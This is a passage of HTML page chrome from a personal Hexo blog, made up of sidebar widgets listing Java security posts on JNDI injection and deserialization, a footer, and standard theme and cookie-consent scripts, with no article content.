class="title">1</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">2</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="https://github.com/hey3e" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile is-multiline"><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Github" href="https://github.com/hey3e"><i class="fab fa-github"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="Twitter" href="https://twitter.com/heyme79611997"><i class="fab fa-twitter"></i></a><a class="level-item button is-transparent is-marginless" target="_blank" rel="noopener" title="RSS" href="/atom.xml"><i class="fas fa-rss"></i></a></div></div></div><!--!--><div class="card widget" data-type="categories"><div class="card-content"><div class="menu"><h3 class="menu-label">Categories</h3><ul class="menu-list"><li><a class="level is-mobile" href="/categories/JavaSec/"><span class="level-start"><span class="level-item">JavaSec</span></span><span class="level-end"><span class="level-item tag">2</span></span></a></li></ul></div></div></div><div class="card widget" data-type="recent-posts"><div class="card-content"><h3 class="menu-label">Recents</h3><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-12-29T13:40:23.896Z">2021-12-29</time></p><p class="title"><a href="/2021/12/29/JavaSec%E7%B3%BB%E5%88%97-2-JNDI%E6%B3%A8%E5%85%A5/%E6%9C%AA%E5%91%BD%E5%90%8D/"> </a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-12-29T13:39:16.000Z">2021-12-29</time></p><p class="title"><a href="/2021/12/29/JavaSec%E7%B3%BB%E5%88%97-2-JNDI%E6%B3%A8%E5%85%A5/">JavaSec系列 - 2. JNDI注入</a></p><p class="categories"><a href="/categories/JavaSec/">JavaSec</a></p></div></article><article class="media"><div class="media-content"><p class="date"><time dateTime="2021-12-22T13:45:42.000Z">2021-12-22</time></p><p class="title"><a href="/2021/12/22/JavaSec%E7%B3%BB%E5%88%97-1-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%8E%E5%8F%8D%E5%B0%84/">JavaSec系列 - 1. 反序列化与反射</a></p><p class="categories"><a href="/categories/JavaSec/">JavaSec</a></p></div></article></div></div><div class="card widget" data-type="archives"><div class="card-content"><div class="menu"><h3 class="menu-label">Archives</h3><ul class="menu-list"><li><a class="level is-mobile" href="/archives/2021/12/"><span class="level-start"><span class="level-item">December 2021</span></span><span class="level-end"><span class="level-item tag">3</span></span></a></li></ul></div></div></div><div class="card widget" data-type="tags"><div class="card-content"><div class="menu"><h3 class="menu-label">Tags</h3><div class="field is-grouped is-grouped-multiline"><div class="control"><a class="tags has-addons" href="/tags/%E5%8F%8D%E5%B0%84/"><span class="tag">反射</span><span class="tag">2</span></a></div><div class="control"><a class="tags has-addons" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/"><span class="tag">反序列化</span><span class="tag">2</span></a></div></div></div></div></div></div><!--!--></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/logo.svg" alt="HEY3E" height="28"></a><p class="is-size-7"><span>&copy; 2021 hey3e</span>  Powered by <a href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank" rel="noopener">Icarus</a></p></div><div class="level-end"></div></div></div></footer><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/moment@2.22.2/min/moment-with-locales.min.js"></script><script src="https://cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js" defer></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="/js/column.js"></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back_to_top.js" defer></script><!--!--><!--!--><!--!--><script src="https://cdn.jsdelivr.net/npm/cookieconsent@3.1.1/build/cookieconsent.min.js" defer></script><script>window.addEventListener("load", () => {
      window.cookieconsent.initialise({
        type: "info",
        theme: "edgeless",
        static: false,
        position: "bottom-left",
        content: {
          message: "This website uses cookies to improve your experience.",
          dismiss: "Got it!",
          allow: "Allow cookies",
          deny: "Decline",
          link: "Learn more",
          policy: "Cookie Policy",
          href: "https://www.cookiesandyou.com/",
        },
        palette: {
          popup: {
            background: "#edeff5",
            text: "#838391"
          },
          button: {
            background: "#4b81e8"
          },
        },
      });
    });</script><script src="https://cdn.jsdelivr.net/npm/lightgallery@1.6.8/dist/js/lightgallery.min.js" defer></script><script src="https://cdn.jsdelivr.net/npm/justifiedGallery@3.7.0/dist/js/jquery.justifiedGallery.min.js" defer></script><script>window.addEventListener("load", () => {
            if (typeof $.fn.lightGallery === 'function') {
                $('.article').lightGallery({ selector: '.gallery-item' });
            }
            if (typeof $.fn.justifiedGallery === 'function') {
                if ($('.justified-gallery > p > .gallery-item').length) {
                    $('.justified-gallery > p > .gallery-item').unwrap();
                }
                $('.justified-gallery').justifiedGallery();
            }
        });</script><!--!--><!--!--><!--!--><!--!--><!--!--><script src="/js/main.js" defer></script><div class="searchbox"><div class="searchbox-container"><div class="searchbox-header"><div class="searchbox-input-container"><input class="searchbox-input" type="text" placeholder="Type something..."></div><a class="searchbox-close" href="javascript:;">×</a></div><div class="searchbox-body"></div></div></div><script src="/js/insight.js" defer></script><script>document.addEventListener('DOMContentLoaded', function () {
            loadInsight({"contentUrl":"/content.json"}, {"hint":"Type something...","untitled":"(Untitled)","posts":"Posts","pages":"Pages","categories":"Categories","tags":"Tags"});
        });</script></body></html>